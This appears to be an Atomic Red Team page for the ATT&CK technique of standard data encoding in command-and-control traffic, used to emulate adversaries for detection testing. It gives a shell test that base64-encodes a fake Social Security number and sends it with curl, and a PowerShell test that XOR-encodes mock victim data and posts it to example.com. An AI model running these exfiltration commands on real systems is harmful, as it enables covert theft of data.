Try it using Invoke-Atomic

Data Encoding: Standard Encoding

Description from ATT&CK

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

Atomic Tests

Atomic Test #1 - Base64 Encoded data.

Utilizing a common technique for posting base64 encoded data.

Supported Platforms: macos,linux

auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25

Inputs:

Name Description Type Default Value
destination_url Destination URL to post encoded data. url redcanary.com
base64_data Encoded data to post using fake Social Security number 111-11-1111. string MTExLTExLTExMTE=

Attack Commands: Run with sh!

1
2
3

echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}

Atomic Test #2 - XOR Encoded data.

XOR encodes the data with a XOR key. Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f

Supported Platforms: windows

auto_generated_guid: c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08

Inputs:

Name Description Type Default Value
destination_url Destination URL to post encoded data. url example.com
plaintext Plain text mimicking victim data sent to C2 server. string Path\n—-\nC:\Users\victim
key XOR key used for encoding the plaintext. string abcdefghijklmnopqrstuvwxyz123456

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
8
9
10

$plaintext = ([system.Text.Encoding]::UTF8.getBytes("#{plaintext}"))
$key = "#{key}"
$cyphertext =  @();
for ($i = 0; $i -lt $plaintext.Count; $i++) {
 $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $cyphertext -DisableKeepAlive

source